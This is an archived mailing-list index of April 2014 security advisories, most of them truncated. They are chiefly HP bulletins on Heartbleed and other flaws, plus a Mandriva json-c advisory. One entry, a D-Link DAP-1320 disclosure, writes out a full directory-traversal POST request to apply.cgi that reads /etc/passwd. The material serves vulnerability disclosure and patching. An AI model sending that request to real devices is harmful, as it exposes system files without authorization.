security-alert | 17 Apr 20:34 2014
Picon

[security bulletin] HPSBMU02995 rev.3 - HP Software HP Service Manager, Asset Manager, UCMDB Browser, UCMDB Configuration Manager, Executive Scorecard, Server Automation, Diagnostics, LoadRunner, and Performance Center, running OpenSSL, Remote Disclosure of Information


Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c04236102

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04236102
Version: 3

HPSBMU02995 rev.3 - HP Software HP Service Manager, Asset Manager, UCMDB
Browser, UCMDB Configuration Manager, Executive Scorecard, Server Automation,
Diagnostics, LoadRunner, and Performance Center, running OpenSSL, Remote
Disclosure of Information

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2014-04-11
Last Updated: 2014-04-17

Potential Security Impact: Remote disclosure of information

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
The Heartbleed vulnerability was detected in specific OpenSSL versions.
OpenSSL is a 3rd party product that is embedded with some of HP Software
products. This bulletin objective is to notify HP Software customers about
products affected by the Heartbleed vulnerability.
(Continue reading)

security-alert | 17 Apr 19:46 2014
Picon

[security bulletin] HPSBMU02998 rev.2 - HP System Management Homepage (SMH) running OpenSSL on Linux and Windows, Remote Disclosure of Information, Denial of Service (DoS)


Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c04239372

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04239372
Version: 2

HPSBMU02998 rev.2 - HP System Management Homepage (SMH) running OpenSSL on
Linux and Windows, Remote Disclosure of Information, Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2014-04-13
Last Updated: 2014-04-17

Potential Security Impact: Remote disclosure of information, Denial of
Service (DoS)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP System
Management Homepage (SMH) running on Linux and Windows. The vulnerabilities
could be exploited remotely resulting in Denial of Service (DoS). Also
included is the OpenSSL vulnerability known as "Heartbleed" which could be
exploited remotely resulting in disclosure of information.
(Continue reading)

security-alert | 17 Apr 16:02 2014
Picon

[security bulletin] HPSBGN03010 rev.1 - HP Software Server Automation, "HeartBleed" OpenSSL Vulnerability, Remote Disclosure of Information


Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c04250814

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04250814
Version: 1

HPSBGN03010 rev.1 - HP Software Server Automation, "HeartBleed" OpenSSL
Vulnerability, Remote Disclosure of Information

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2014-04-17
Last Updated: 2014-04-17

Potential Security Impact: Remote disclosure of information

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
The Heartbleed vulnerability was detected in specific OpenSSL versions.
OpenSSL is a 3rd party product that is embedded with some of HP Software
products. This bulletin objective is to notify HP Software customers about
products affected by the Heartbleed vulnerability.

NOTE: The Heartbleed vulnerability (CVE-2014-0160) is a vulnerability found
(Continue reading)

security | 17 Apr 11:02 2014

[ MDVSA-2014:079 ] json-c


 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2014:079
 http://www.mandriva.com/en/support/security/
 _______________________________________________________________________

 Package : json-c
 Date    : April 17, 2014
 Affected: Business Server 1.0
 _______________________________________________________________________

 Problem Description:

 Updated json-c packages fix security vulnerabilities:

 Florian Weimer reported that the printbuf APIs used in the json-c
 library used ints for counting buffer lengths, which is inappropriate
 for 32bit architectures.  These functions need to be changed to using
 size_t if possible for sizes, or to be hardened against negative
 values if not.  This could be used to cause a denial of service in
 an application linked to the json-c library (CVE-2013-6370).

 Florian Weimer reported that the hash function in the json-c library
 was weak, and that parsing smallish JSON strings showed quadratic
 timing behaviour. This could cause an application linked to the json-c
 library, and that processes some specially-crafted JSON data, to use
 excessive amounts of CPU (CVE-2013-6371).
 _______________________________________________________________________

(Continue reading)

kyle Lovett | 17 Apr 08:50 2014
Picon

D-Link DAP-1320 Wireless Range Extender Directory Traversal and XSS Vulnerabilities

D-Link's DAP-1320 Wireless Range Extender suffers from both a
directory traversal and a XSS vulnerability on all firmware versions.
(current v. 1.20B07)

---------------------------------------------------------------------------------------------------------------------
Directory Traversal
CWE-22: Path Traversal

The POST param 'html_response_page' of apply.cgi suffers from a
directory traversal vulnerability.

The following example will display the contents of /etc/passwd:

http://<IP>/apply.cgi
Pragma: no-cache
Cache-control: no-cache
Content-Type: application/x-www-form-urlencoded

POST html_response_page=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&login_name=&html_response_message=just_login&log_pass=&login_n=admin&action=do_graph_auth&tmp_log_pass=PAN&tmp_log_pass_auth=FRIED&graph_code=0DEY&session_id=57687&gcode_base64=8TEHPOO%3D
HTTP/1.1

---------------------------------------------------------------------------------------------------------------------
XSS
CWE-79: Cross Site Scripting

The POST param 'html_response_page' of apply.cgi suffers from a XSS
vulnerability.

Example:

(Continue reading)

security-alert | 17 Apr 05:11 2014
Picon

[security bulletin] HPSBMU02935 rev.2 - HP LoadRunner Virtual User Generator, Remote Code Execution, Disclosure of information


Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c03969437

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03969437
Version: 2

HPSBMU02935 rev.2 - HP LoadRunner Virtual User Generator, Remote Code
Execution, Disclosure of information

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2013-10-30
Last Updated: 2014-04-17

Potential Security Impact: Remote code execution, disclosure of information

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP LoadRunner
Virtual User Generator. The vulnerabilities could be exploited to allow
remote code execution and disclosure of information.

References:
CVE-2013-4837 (ZDI-CAN-1832, SSRT101191)
(Continue reading)

security-alert | 17 Apr 04:54 2014
Picon

[security bulletin] HPSBMU02987 rev.1 - HP Universal Configuration Management Database Integration Service, Remote Code Execution


Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c04219959

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04219959
Version: 1

HPSBMU02987 rev.1 - HP Universal Configuration Management Database
Integration Service, Remote Code Execution

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2014-04-17
Last Updated: 2014-04-17

Potential Security Impact: Remote code execution

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP Universal
Configuration Management Database Integration Service. The vulnerability
could be exploited to allow remote execution of code.

References:
CVE-2013-6215 (SSRT101372, ZDI-CAN-1977)
(Continue reading)

security-alert | 17 Apr 04:38 2014
Picon

[security bulletin] HPSBMU02988 rev.1 - HP Universal Configuration Management Database, Disclosure of Information


Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c04220407

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04220407
Version: 1

HPSBMU02988 rev.1 - HP Universal Configuration Management Database,
Disclosure of Information

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2014-04-17
Last Updated: 2014-04-17

Potential Security Impact: Disclosure of Information

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP Universal
Configuration Management Database Integration Service. The vulnerability
could be exploited to allow disclosure of information.

References:
CVE-2013-6214 (ZDI-CAN-2042, SSRT101373)
(Continue reading)

security-alert | 17 Apr 04:12 2014
Picon

[security bulletin] HPSBMU02982 rev.1 - HP Database and Middleware Automation, Disclosure of Information


Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c04201408

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04201408
Version: 1

HPSBMU02982 rev.1 - HP Database and Middleware Automation, Disclosure of
Information

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2014-04-17
Last Updated: 2014-04-17

Potential Security Impact: Disclosure of information

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP Database and
Middleware Automation (DMA). The vulnerability could be remotely exploited
resulting in disclosure of information.

References: CVE-2013-6212 (SSRT101475)

(Continue reading)

security-alert | 17 Apr 02:15 2014
Picon

[security bulletin] HPSBGN03008 rev.1 - HP Software Service Manager, "HeartBleed" OpenSSL Vulnerability, Remote Disclosure of Information


Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c04248997

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04248997
Version: 1

HPSBGN03008 rev.1 - HP Software Service Manager, "HeartBleed" OpenSSL
Vulnerability, Remote Disclosure of Information

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2014-04-16
Last Updated: 2014-04-16

Potential Security Impact: Remote disclosure of information

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
The Heartbleed vulnerability was detected in specific OpenSSL versions.
OpenSSL is a 3rd party product that is embedded with some of HP Software
products. This bulletin objective is to notify HP Software customers about
products affected by the Heartbleed vulnerability.

NOTE: The Heartbleed vulnerability (CVE-2014-0160) is a vulnerability found
(Continue reading)

security-alert | 16 Apr 22:51 2014
Picon

[security bulletin] HPSBMU02996 rev.1 - HP Network Node Manager I (NNMi) for HP-UX, Linux, Solaris, and Windows, Remote Unauthorized Access, Execution of Arbitrary Code


Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c04026039

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04026039
Version: 1

HPSBMU02996 rev.1 - HP Network Node Manager I (NNMi) for HP-UX, Linux,
Solaris, and Windows, Remote Unauthorized Access, Execution of Arbitrary Code

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2014-04-15
Last Updated: 2014-04-15

Potential Security Impact: Remote unauthorized access, execution of arbitrary
code

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP Network Node
Manager I (NNMi) on HP-UX, Linux, Solaris, and Windows. This vulnerability
could be remotely exploited resulting in unauthorized access or execution of
arbitrary code.

(Continue reading)


Gmane